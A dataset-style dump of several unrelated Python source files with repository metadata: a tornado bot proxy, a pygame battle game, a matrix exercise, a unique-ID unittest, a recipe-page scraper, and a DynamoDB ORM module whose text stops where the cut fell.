self._manager = weakref.proxy(manager)
self._bot = botClass(self, serviceName, appData)
self._ioLoop = tornado.ioloop.IOLoop.instance()
# asynchronously inform local manager we're ready
self.add_callback(self._manager.on_bot_ready,
serviceName, serviceToken, self)
def on_message(self, mtdName, *args):
'''Proxy messages from manager to bot impl.'''
try:
mtd = getattr(self._bot, mtdName)
except AttributeError:
# bot isn't listening for this message type
return
# keep sync with manager so we can catch exceptions, else exception
# fires in context of original request which is wrong, it's a bot
# error not a client error
try:
mtd(*args)
except Exception:
log.exception('bot error')
def reply(self, replyToken, data):
'''Sends a private reply to a requestor.'''
self._manager.on_bot_response(self.serviceName, replyToken, data)
def publish(self, data):
'''Sends a public reply to subscribes on a bot subchannel.'''
self._manager.on_bot_publish(self.serviceName, data)
def add_callback(self, callback, *args, **kwargs):
'''Schedule a callback in the main loop.'''
f = functools.partial(callback, *args, **kwargs)
self._ioLoop.add_callback(f)
def add_timer(self, delay, callback, *args, **kwargs):
'''Add a one-shot timer that schedules a main loop callback.'''
f = functools.partial(callback, *args, **kwargs)
return self._ioLoop.add_timeout(time.time() + delay, f)
def remove_timer(self, timer):
'''Remove a one-shot timer.'''
self._ioLoop.remove_timeout(timer)
| 35.287879
| 78
| 0.653499
| 282
| 2,329
| 5.294326
| 0.411348
| 0.036839
| 0.048225
| 0.03215
| 0.046885
| 0.046885
| 0
| 0
| 0
| 0
| 0
| 0.006861
| 0.249034
| 2,329
| 65
| 79
| 35.830769
| 0.84677
| 0.278231
| 0
| 0.105263
| 0
| 0
| 0.011002
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.184211
| false
| 0
| 0.157895
| 0
| 0.421053
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c76baa8499aec4813a3d47e851bd3cbe62268bf
| 6,193
|
py
|
Python
|
battle_tut5.py
|
lankotiAditya/RPG_battle_main
|
0063941d023ff1c18a6b050fab4d0c7ec583b11a
|
[
"MIT"
] | 22
|
2021-01-13T10:21:42.000Z
|
2022-03-10T00:06:05.000Z
|
battle_tut5.py
|
lankotiAditya/RPG_battle_main
|
0063941d023ff1c18a6b050fab4d0c7ec583b11a
|
[
"MIT"
] | 1
|
2021-01-14T17:02:41.000Z
|
2021-01-14T20:23:38.000Z
|
battle_tut5.py
|
lankotiAditya/RPG_battle_main
|
0063941d023ff1c18a6b050fab4d0c7ec583b11a
|
[
"MIT"
] | 33
|
2021-01-17T08:52:38.000Z
|
2022-03-28T10:36:36.000Z
|
import pygame
import random
pygame.init()
clock = pygame.time.Clock()
fps = 60
#game window
bottom_panel = 150
screen_width = 800
screen_height = 400 + bottom_panel
screen = pygame.display.set_mode((screen_width, screen_height))
pygame.display.set_caption('Battle')
#define game variables
current_fighter = 1
total_fighters = 3
action_cooldown = 0
action_wait_time = 90
attack = False
potion = False
clicked = False
#define fonts
font = pygame.font.SysFont('Times New Roman', 26)
#define colours
red = (255, 0, 0)
green = (0, 255, 0)
#load images
#background image
background_img = pygame.image.load('img/Background/background.png').convert_alpha()
#panel image
panel_img = pygame.image.load('img/Icons/panel.png').convert_alpha()
#sword image
sword_img = pygame.image.load('img/Icons/sword.png').convert_alpha()
#create function for drawing text
def draw_text(text, font, text_col, x, y):
img = font.render(text, True, text_col)
screen.blit(img, (x, y))
#function for drawing background
def draw_bg():
screen.blit(background_img, (0, 0))
#function for drawing panel
def draw_panel():
#draw panel rectangle
screen.blit(panel_img, (0, screen_height - bottom_panel))
#show knight stats
draw_text(f'{knight.name} HP: {knight.hp}', font, red, 100, screen_height - bottom_panel + 10)
for count, i in enumerate(bandit_list):
#show name and health
draw_text(f'{i.name} HP: {i.hp}', font, red, 550, (screen_height - bottom_panel + 10) + count * 60)
#fighter class
class Fighter():
def __init__(self, x, y, name, max_hp, strength, potions):
self.name = name
self.max_hp = max_hp
self.hp = max_hp
self.strength = strength
self.start_potions = potions
self.potions = potions
self.alive = True
self.animation_list = []
self.frame_index = 0
self.action = 0#0:idle, 1:attack, 2:hurt, 3:dead
self.update_time = pygame.time.get_ticks()
#load idle images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Idle/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
#load attack images
temp_list = []
for i in range(8):
img = pygame.image.load(f'img/{self.name}/Attack/{i}.png')
img = pygame.transform.scale(img, (img.get_width() * 3, img.get_height() * 3))
temp_list.append(img)
self.animation_list.append(temp_list)
self.image = self.animation_list[self.action][self.frame_index]
self.rect = self.image.get_rect()
self.rect.center = (x, y)
def update(self):
animation_cooldown = 100
#handle animation
#update image
self.image = self.animation_list[self.action][self.frame_index]
#check if enough time has passed since the last update
if pygame.time.get_ticks() - self.update_time > animation_cooldown:
self.update_time = pygame.time.get_ticks()
self.frame_index += 1
#if the animation has run out then reset back to the start
if self.frame_index >= len(self.animation_list[self.action]):
self.idle()
def idle(self):
#set variables to attack animation
self.action = 0
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def attack(self, target):
#deal damage to enemy
rand = random.randint(-5, 5)
damage = self.strength + rand
target.hp -= damage
#check if target has died
if target.hp < 1:
target.hp = 0
target.alive = False
#set variables to attack animation
self.action = 1
self.frame_index = 0
self.update_time = pygame.time.get_ticks()
def draw(self):
screen.blit(self.image, self.rect)
class HealthBar():
def __init__(self, x, y, hp, max_hp):
self.x = x
self.y = y
self.hp = hp
self.max_hp = max_hp
def draw(self, hp):
#update with new health
self.hp = hp
#calculate health ratio
ratio = self.hp / self.max_hp
pygame.draw.rect(screen, red, (self.x, self.y, 150, 20))
pygame.draw.rect(screen, green, (self.x, self.y, 150 * ratio, 20))
knight = Fighter(200, 260, 'Knight', 30, 10, 3)
bandit1 = Fighter(550, 270, 'Bandit', 20, 6, 1)
bandit2 = Fighter(700, 270, 'Bandit', 20, 6, 1)
bandit_list = []
bandit_list.append(bandit1)
bandit_list.append(bandit2)
knight_health_bar = HealthBar(100, screen_height - bottom_panel + 40, knight.hp, knight.max_hp)
bandit1_health_bar = HealthBar(550, screen_height - bottom_panel + 40, bandit1.hp, bandit1.max_hp)
bandit2_health_bar = HealthBar(550, screen_height - bottom_panel + 100, bandit2.hp, bandit2.max_hp)
run = True
while run:
clock.tick(fps)
#draw background
draw_bg()
#draw panel
draw_panel()
knight_health_bar.draw(knight.hp)
bandit1_health_bar.draw(bandit1.hp)
bandit2_health_bar.draw(bandit2.hp)
#draw fighters
knight.update()
knight.draw()
for bandit in bandit_list:
bandit.update()
bandit.draw()
#control player actions
#reset action variables
attack = False
potion = False
target = None
#make sure mouse is visible
pygame.mouse.set_visible(True)
pos = pygame.mouse.get_pos()
for count, bandit in enumerate(bandit_list):
if bandit.rect.collidepoint(pos):
#hide mouse
pygame.mouse.set_visible(False)
#show sword in place of mouse cursor
screen.blit(sword_img, pos)
if clicked == True:
attack = True
target = bandit_list[count]
#player action
if knight.alive == True:
if current_fighter == 1:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#look for player action
#attack
if attack == True and target != None:
knight.attack(target)
current_fighter += 1
action_cooldown = 0
#enemy action
for count, bandit in enumerate(bandit_list):
if current_fighter == 2 + count:
if bandit.alive == True:
action_cooldown += 1
if action_cooldown >= action_wait_time:
#attack
bandit.attack(knight)
current_fighter += 1
action_cooldown = 0
else:
current_fighter += 1
#if all fighters have had a turn then reset
if current_fighter > total_fighters:
current_fighter = 1
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
if event.type == pygame.MOUSEBUTTONDOWN:
clicked = True
else:
clicked = False
pygame.display.update()
pygame.quit()
| 23.911197
| 101
| 0.707089
| 947
| 6,193
| 4.476241
| 0.195354
| 0.012975
| 0.023119
| 0.032555
| 0.313281
| 0.248879
| 0.215145
| 0.181647
| 0.14343
| 0.122199
| 0
| 0.028878
| 0.172453
| 6,193
| 258
| 102
| 24.003876
| 0.798244
| 0.141773
| 0
| 0.295597
| 0
| 0
| 0.040212
| 0.016502
| 0
| 0
| 0
| 0
| 0
| 1
| 0.062893
| false
| 0
| 0.012579
| 0
| 0.08805
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c791be103564830f1d4250200840c0dccc964ac
| 651
|
py
|
Python
|
curso_em_video/0087a.py
|
marinaoliveira96/python-exercises
|
13fc0ec30dec9bb6531cdeb41c80726971975835
|
[
"MIT"
] | null | null | null |
curso_em_video/0087a.py
|
marinaoliveira96/python-exercises
|
13fc0ec30dec9bb6531cdeb41c80726971975835
|
[
"MIT"
] | null | null | null |
curso_em_video/0087a.py
|
marinaoliveira96/python-exercises
|
13fc0ec30dec9bb6531cdeb41c80726971975835
|
[
"MIT"
] | null | null | null |
matriz = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]
soma = col3 = maior = 0
for l in range(0, 3):
for c in range(0, 3):
matriz[l][c] = int(input(f'[{l}][{c}]: '))
for l in range(0, 3):
for c in range(0, 3):
print(f'[{matriz[l][c]:^5}]', end='')
if matriz[l][c] % 2 == 0:
soma += matriz[l][c]
print()
for l in range(0, 3):
col3 += matriz[l][2]
for c in range(0, 3):
if c == 0:
maior = matriz[1][c]
elif matriz[1][c] > maior:
maior = matriz[1][c]
print(f'A soma dos numeros pares é {soma}')
print(f'A soma dos valores da 3 coluna é {col3}')
print(f'O maior numero da 2 linha é {maior}')
| 31
| 50
| 0.506912
| 126
| 651
| 2.619048
| 0.253968
| 0.048485
| 0.063636
| 0.072727
| 0.348485
| 0.263636
| 0.184848
| 0.184848
| 0.157576
| 0.157576
| 0
| 0.07431
| 0.276498
| 651
| 21
| 51
| 31
| 0.626327
| 0
| 0
| 0.380952
| 0
| 0
| 0.211656
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.238095
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c79db5803090229f5cee46e595e5f692bd63c32
| 1,652
|
py
|
Python
|
camd3/infrastructure/component/tests/test_uidattr.py
|
mamrhein/CAmD3
|
d20f62295771a297c3fbb314beef314e5ec7a2b5
|
[
"BSD-2-Clause"
] | null | null | null |
camd3/infrastructure/component/tests/test_uidattr.py
|
mamrhein/CAmD3
|
d20f62295771a297c3fbb314beef314e5ec7a2b5
|
[
"BSD-2-Clause"
] | null | null | null |
camd3/infrastructure/component/tests/test_uidattr.py
|
mamrhein/CAmD3
|
d20f62295771a297c3fbb314beef314e5ec7a2b5
|
[
"BSD-2-Clause"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# ----------------------------------------------------------------------------
# Name: test_uidattr
# Purpose: Test driver for module 'uidattr'
#
# Author: Michael Amrhein (michael@adrhinum.de)
#
# Copyright: (c) 2018 Michael Amrhein
# ----------------------------------------------------------------------------
# $Source$
# $Revision$
"""Test driver for module 'uidattr'"""
import unittest
from uuid import uuid1
from camd3.infrastructure.component import (
Component, register_utility, UniqueIdAttribute)
from camd3.infrastructure.component.idfactories import (
UUIDGenerator, uuid_generator)
# factory for UUIDs
def custom_uuid_generator() -> UUIDGenerator: # noqa: D103
while True:
yield uuid1()
class ExplID(Component):
id = UniqueIdAttribute(uid_gen=custom_uuid_generator())
def __init__(self):
self.__class__.id.set_once(self)
class ImplID(Component):
id = UniqueIdAttribute()
def __init__(self):
self.__class__.id.set_once(self)
class UniqueIdAttributeTest(unittest.TestCase):
def setUp(self):
register_utility(uuid_generator(), UUIDGenerator)
self.cid = ImplID()
def test_init(self):
cid = ImplID()
self.assertIsNotNone(cid.id)
self.assertIsNotNone(cid._id)
def test_uniqueness(self):
ids = {self.cid.id}
for i in range(10):
cid = ExplID()
self.assertNotIn(cid.id, ids)
ids.add(cid.id)
if __name__ == '__main__': # pragma: no cover
unittest.main()
| 23.6
| 78
| 0.578087
| 166
| 1,652
| 5.518072
| 0.451807
| 0.027293
| 0.028384
| 0.041485
| 0.139738
| 0.082969
| 0.082969
| 0.082969
| 0.082969
| 0.082969
| 0
| 0.011792
| 0.230024
| 1,652
| 69
| 79
| 23.942029
| 0.708333
| 0.276634
| 0
| 0.121212
| 0
| 0
| 0.006809
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.181818
| false
| 0
| 0.121212
| 0
| 0.454545
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c7a9873c160d856f0a448855b2b79215e8191fc
| 883
|
py
|
Python
|
s.py
|
tn012604409/HW3_chatRobot
|
97762e53bfccd8b30c6b263792919c679e53b404
|
[
"MIT"
] | null | null | null |
s.py
|
tn012604409/HW3_chatRobot
|
97762e53bfccd8b30c6b263792919c679e53b404
|
[
"MIT"
] | null | null | null |
s.py
|
tn012604409/HW3_chatRobot
|
97762e53bfccd8b30c6b263792919c679e53b404
|
[
"MIT"
] | null | null | null |
import requests
import time
from bs4 import BeautifulSoup
def get_web_page(url):
resp = requests.get(
url=url,
)
if resp.status_code != 200:
print('Invalid url:', resp.url)
return None
else:
return resp.text
def get_articles(dom):
soup = BeautifulSoup(dom, 'html.parser')
tag = soup.find_all('a','recipe-name')
articles=tag
return articles
def run():
page = get_web_page('https://icook.tw/recipes/popular?ref=icook-footer')
if page:
current_articles = get_articles(page)
i=1
s=''
for post in current_articles:
temp=str(post)
num=int(temp.find("\" href="))
#print('The Number {0}: {1}'.format(i, temp[35:num]))
s=s+'The Number {0}: {1}\n'.format(i, temp[35:num])
i=i+1
return s
| 22.641026
| 76
| 0.551529
| 118
| 883
| 4.042373
| 0.5
| 0.025157
| 0.041929
| 0.046122
| 0.067086
| 0
| 0
| 0
| 0
| 0
| 0
| 0.023102
| 0.313703
| 883
| 38
| 77
| 23.236842
| 0.764026
| 0.05889
| 0
| 0
| 0
| 0
| 0.127711
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103448
| false
| 0
| 0.103448
| 0
| 0.344828
| 0.034483
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4c7abb53711251283db1d2b1869388b7608f3858
| 21,493
|
py
|
Python
|
awstin/dynamodb/orm.py
|
k2bd/awstin
|
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
|
[
"MIT"
] | 1
|
2020-12-29T20:49:27.000Z
|
2020-12-29T20:49:27.000Z
|
awstin/dynamodb/orm.py
|
k2bd/awstin
|
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
|
[
"MIT"
] | 69
|
2020-11-16T21:16:44.000Z
|
2021-04-14T17:16:33.000Z
|
awstin/dynamodb/orm.py
|
k2bd/awstin
|
7360cc20d3c72a6aa87de57146b9c5f4247c58d5
|
[
"MIT"
] | null | null | null |
import uuid
from abc import ABC, abstractmethod
from collections import defaultdict
from typing import Union
from boto3.dynamodb.conditions import Attr as BotoAttr
from boto3.dynamodb.conditions import Key as BotoKey
from awstin.dynamodb.utils import from_decimal, to_decimal
class NotSet:
"""
A value of an attribute on a data model is not present in a DynamoDB result
"""
def __str__(self):
return "<<Attribute not set>>"
def __repr__(self):
return "<<Attribute not set>>"
NOT_SET = NotSet()
class BaseAttribute:
def __init__(self, attribute_name: Union[str, None] = None):
"""
Parameters
----------
attribute_name : str, optional
Name of the property in the DynamoDB table. Defaults to the name of
the attribute on the DynamoModel class.
"""
# Set by user
self._attribute_name = attribute_name
# Set by Model
self._name_on_model = None
@property
def _awstin_name(self):
if self._attribute_name is not None:
return self._attribute_name
else:
return self._name_on_model
def __getattr__(self, name):
"""
Support for nested mapping queries
"""
try:
return super().__getattr__(name)
except AttributeError:
return type(self)(attribute_name=f"{self._awstin_name}.{name}")
def __getitem__(self, index):
"""
Support for nested container queries
"""
return type(self)(attribute_name=f"{self._awstin_name}[{index}]")
# --- Query and scan filter expressions ---
def begins_with(self, value):
"""
Filter results by a key or attribute beginning with a value
Parameters
----------
value : str
Starting string for returned results
"""
return self._query_type(self._awstin_name).begins_with(to_decimal(value))
def between(self, low, high):
"""
Filter results by range (inclusive)
Parameters
----------
low : Any
Low end of the range
high : Any
High end of the range
"""
return self._query_type(self._awstin_name).between(
to_decimal(low),
to_decimal(high),
)
def __eq__(self, value):
return self._query_type(self._awstin_name).eq(to_decimal(value))
def __gt__(self, value):
return self._query_type(self._awstin_name).gt(to_decimal(value))
def __ge__(self, value):
return self._query_type(self._awstin_name).gte(to_decimal(value))
def __lt__(self, value):
return self._query_type(self._awstin_name).lt(to_decimal(value))
def __le__(self, value):
return self._query_type(self._awstin_name).lte(to_decimal(value))
def attribute_type(self, value):
"""
Filter results by attribute type
Parameters
----------
value : str
Index for a DynamoDB attribute type (e.g. "N" for Number)
"""
return BotoAttr(self._awstin_name).attribute_type(to_decimal(value))
def contains(self, value):
"""
Filter results by attributes that are containers and contain the target
value
Parameters
----------
values : Any
Result must contain this item
"""
return BotoAttr(self._awstin_name).contains(to_decimal(value))
def exists(self):
"""
Filter results by existence of an attribute
"""
return BotoAttr(self._awstin_name).exists()
def in_(self, values):
"""
Filter results by existence in a set
Parameters
----------
values : list of Any
Allowed values of returned results
"""
in_values = [to_decimal(value) for value in values]
return BotoAttr(self._awstin_name).is_in(in_values)
def __ne__(self, value):
return BotoAttr(self._awstin_name).ne(to_decimal(value))
def not_exists(self):
"""
Filter results by non-existence of an attribute
"""
return BotoAttr(self._awstin_name).not_exists()
def size(self):
"""
Filter by size of a collection
"""
return Size(self._awstin_name)
# --- Update expressions ---
def set(self, expression):
"""
Set an attribute to a new value.
Corresponds to SET as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
New value, or an expression defining a new value
"""
return SetOperator(self, UpdateOperand(expression))
def remove(self):
"""
Remove an attribute.
Corresponds to REMOVE as part of the update expression in
``Table.update_item``.
"""
return RemoveOperator(self)
def add(self, expression):
"""
Add to an attribute (numerical add or addition to a set).
Corresponds to ADD as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to add
"""
return AddOperator(self, UpdateOperand(expression))
def delete(self, expression):
"""
Delete part of a set attribute.
Corresponds to DELETE as part of the update expression in
``Table.update_item``.
Parameters
----------
expression : UpdateOperand
Value to delete
"""
return DeleteOperator(self, UpdateOperand(expression))
def __add__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "+")
def __sub__(self, other):
return CombineOperand(UpdateOperand(self), UpdateOperand(other), "-")
def __radd__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "+")
def __rsub__(self, other):
return CombineOperand(UpdateOperand(other), UpdateOperand(self), "-")
def if_not_exists(self, value):
"""
Conditionally return a value if this attribute doesn't exist on the
model
"""
return IfNotExistsOperand(UpdateOperand(self), UpdateOperand(value))
class Key(BaseAttribute):
"""
Used to define and query hash and sort key attributes on a dynamodb table
data model
"""
_query_type = BotoKey
class Attr(BaseAttribute):
"""
Used to define and query non-key attributes on a dynamodb table data model
"""
_query_type = BotoAttr
def size_query(self, *args, **kwargs):
return BotoAttr(self._awstin_name).size()
class Size(BaseAttribute):
_query_type = size_query
class DynamoModelMeta(type):
def __getattribute__(self, name):
attr = super().__getattribute__(name)
if isinstance(attr, BaseAttribute):
attr._name_on_model = name
return attr
else:
return attr
def _dynamodb_attributes(self):
result = {
getattr(self, attr)._awstin_name: attr
for attr in dir(self)
if isinstance(getattr(self, attr), BaseAttribute)
}
return result
def _get_kwargs(self):
"""
Kwargs that should be passed to query, scan, get_item
"""
return {
**self._dynamo_projection(),
**self._index_kwargs(),
}
def _dynamo_projection(self):
"""
Attributes to request when retrieving data from DynamoDB
Returns
-------
dict
kwargs to be passed to DynamoDB get attribute calls to employ
a projection expression and placeholders
"""
placeholders = {
"#" + str(uuid.uuid4())[:8]: value
for value in self._dynamodb_attributes().keys()
}
expression = ", ".join(placeholders.keys())
return dict(
ProjectionExpression=expression,
ExpressionAttributeNames=placeholders,
)
def _index_kwargs(self):
if hasattr(self, "_index_name_"):
return dict(
IndexName=self._index_name_,
)
else:
return {}
class DynamoModel(metaclass=DynamoModelMeta):
"""
Class defining an ORM model for a DynamoDB table.
Subclasses must have a ``_table_name_`` attribute. Attributes making up
the data model should be Attr or Key instances.
Subclasses representing indexes should also have an ``_index_name_``
attribute
"""
def __init__(self, **kwargs):
"""
Parameters
----------
**kwargs : dict of (str, Any)
Initialization of Attr and Key attributes.
"""
model_attrs = type(self)._dynamodb_attributes().values()
for name in model_attrs:
setattr(self, name, NOT_SET)
for name, value in kwargs.items():
if name not in model_attrs:
msg = f"{type(self)!r} has no attribute {name!r}"
raise AttributeError(msg)
setattr(self, name, value)
@classmethod
def deserialize(cls, data):
"""
Deserialize JSON into a DynamoModel subclass. Internally converts
Decimal to float in the deserialization.
Parameters
----------
data : dict of (str, Any)
Serialized model
Returns
-------
DynamoModel
The deserialized data model
"""
model_attrs = cls._dynamodb_attributes()
result = cls()
for attr in model_attrs.values():
setattr(result, attr, NOT_SET)
for db_attr, value in data.items():
if db_attr in model_attrs.keys():
if type(value) in [list, set, tuple]:
value = type(value)(from_decimal(v) for v in value)
elif type(value) is dict:
value = {from_decimal(k): from_decimal(v) for k, v in value.items()}
else:
value = from_decimal(value)
setattr(result, model_attrs[db_attr], value)
return result
def serialize(self):
"""
Serialize a DynamoModel subclass to JSON that can be inserted into
DynamoDB. Internally converts float to Decimal.
Returns
-------
dict of (str, Any)
The serialized JSON entry
"""
model_attrs = type(self)._dynamodb_attributes()
result = {}
for dynamo_name, model_name in model_attrs.items():
value = getattr(self, model_name)
if value is not NOT_SET:
if type(value) in [list, set, tuple]:
value = type(value)(to_decimal(v) for v in value)
elif type(value) is dict:
value = {to_decimal(k): to_decimal(v) for k, v in value.items()}
else:
value = to_decimal(value)
result[dynamo_name] = value
return result
# ---- Update Operators
class UpdateOperator(ABC):
"""
A representation of an UpdateItem expression
"""
def __and__(self, other):
"""
Combine two update expressions
"""
return CombineOperator(self, other)
@abstractmethod
def update_dict(self):
pass
@staticmethod
def update_expression(update_dict):
expressions = []
for operation in "SET", "ADD", "DELETE", "REMOVE":
if update_dict.get(operation):
expressions.append(operation + " " + ", ".join(update_dict[operation]))
return " ".join(expressions)
def serialize(self):
"""
Produce kwargs to be passed to DynamoDB Table.update_item.
Keys and values are:
"UpdateExpression": string representing the update expression
"ExpressionAttributeNames": Placeholder map for attribute names
"ExpressionAttributeValues": Placeholder map for attribute values
Returns
-------
dict
Kwargs for update_item
"""
update_dict = self.update_dict()
result = {
"UpdateExpression": self.update_expression(update_dict),
}
if update_dict["ExpressionAttributeNames"]:
result["ExpressionAttributeNames"] = update_dict["ExpressionAttributeNames"]
if update_dict["ExpressionAttributeValues"]:
result["ExpressionAttributeValues"] = update_dict[
"ExpressionAttributeValues"
]
return result
class CombineOperator(UpdateOperator):
"""
Combine two update expressions
"""
def __init__(self, left, right):
self.left = left
self.right = right
def update_dict(self):
result = defaultdict(list)
ser_left = self.left.update_dict()
ser_right = self.right.update_dict()
items = list(ser_left.items()) + list(ser_right.items())
for key, values in items:
if key in ["SET", "ADD", "DELETE", "REMOVE"]:
result[key].extend(values)
result["ExpressionAttributeNames"] = dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
)
result["ExpressionAttributeValues"] = dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
)
return result
class SetOperator(UpdateOperator):
"""
Support for SET
"""
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"SET": [
f"{serialized_attr['UpdateExpression']} = "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class AddOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"ADD": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
class RemoveOperator(UpdateOperator):
def __init__(self, attr):
self.attr = attr
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
return {
"REMOVE": [serialized_attr["UpdateExpression"]],
"ExpressionAttributeNames": serialized_attr["ExpressionAttributeNames"],
"ExpressionAttributeValues": {},
}
class DeleteOperator(UpdateOperator):
def __init__(self, attr, operand):
self.attr = attr
self.operand = operand
def update_dict(self):
serialized_attr = itemize_attr(self.attr)
serialized_operand = self.operand.serialize()
attribute_names = dict(
**serialized_operand["ExpressionAttributeNames"],
**serialized_attr["ExpressionAttributeNames"],
)
return {
"DELETE": [
f"{serialized_attr['UpdateExpression']} "
+ serialized_operand["UpdateExpression"]
],
"ExpressionAttributeNames": attribute_names,
"ExpressionAttributeValues": serialized_operand[
"ExpressionAttributeValues"
],
}
# ---- Update Operands
def serialize_operand(value):
name = str(uuid.uuid4())[:8]
if isinstance(value, UpdateOperand):
return value.serialize()
elif isinstance(value, BaseAttribute):
return itemize_attr(value)
elif type(value) in [list, set, tuple]:
name = ":" + name
value = type(value)([to_decimal(v) for v in value])
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: value},
}
else:
name = ":" + name
return {
"UpdateExpression": name,
"ExpressionAttributeNames": {},
"ExpressionAttributeValues": {name: to_decimal(value)},
}
def itemize_attr(attr):
# Separate indexes
parts = []
current_section = ""
for letter in attr._awstin_name:
if letter == "[":
parts.append(current_section)
current_section = "["
elif letter == "]":
parts.append(current_section + "]")
current_section = ""
else:
current_section += letter
if current_section:
parts.append(current_section)
serialized = ""
name_map = {}
# Separate attributes
for part in parts:
if "[" in part and "]" in part:
serialized += part
else:
if part.startswith("."):
serialized += "."
part = part[1:]
sections = part.split(".")
serialized_sections = []
for section in sections:
name = "#" + str(uuid.uuid4())[:8]
name_map[name] = section
serialized_sections.append(name)
serialized += ".".join(serialized_sections)
result = {
"UpdateExpression": serialized,
"ExpressionAttributeNames": name_map,
"ExpressionAttributeValues": {},
}
return result
class UpdateOperand:
"""
Inner part of an update expression
"""
def __init__(self, value):
self.value = value
def serialize(self):
return serialize_operand(self.value)
class CombineOperand(UpdateOperand):
"""
Add or subtact two expressions
"""
def __init__(self, left, right, symbol):
self.left = left
self.right = right
self.symbol = symbol
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"{ser_left['UpdateExpression']} "
f"{self.symbol} "
f"{ser_right['UpdateExpression']}"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
class IfNotExistsOperand(UpdateOperand):
"""
Set a value if the given attribute does not exist
"""
def __init__(self, attr, value):
self.attr = attr
self.value = value
def serialize(self):
ser_attr = serialize_operand(self.attr)
ser_value = serialize_operand(self.value)
expression = (
f"if_not_exists({ser_attr['UpdateExpression']}, "
f"{ser_value['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_attr["ExpressionAttributeNames"],
**ser_value["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_attr["ExpressionAttributeValues"],
**ser_value["ExpressionAttributeValues"],
),
}
class ListAppendOperand(UpdateOperand):
"""
Combine two lists
"""
def __init__(self, left, right):
self.left = left
self.right = right
def serialize(self):
ser_left = serialize_operand(self.left)
ser_right = serialize_operand(self.right)
expression = (
f"list_append({ser_left['UpdateExpression']}, "
f"{ser_right['UpdateExpression']})"
)
return {
"UpdateExpression": expression,
"ExpressionAttributeNames": dict(
**ser_left["ExpressionAttributeNames"],
**ser_right["ExpressionAttributeNames"],
),
"ExpressionAttributeValues": dict(
**ser_left["ExpressionAttributeValues"],
**ser_right["ExpressionAttributeValues"],
),
}
def list_append(left, right):
"""
Set a value to the combination of two lists in an update expression
"""
return ListAppendOperand(UpdateOperand(left), UpdateOperand(right))
| 27.912987
| 88
| 0.579258
| 2,062
| 21,493
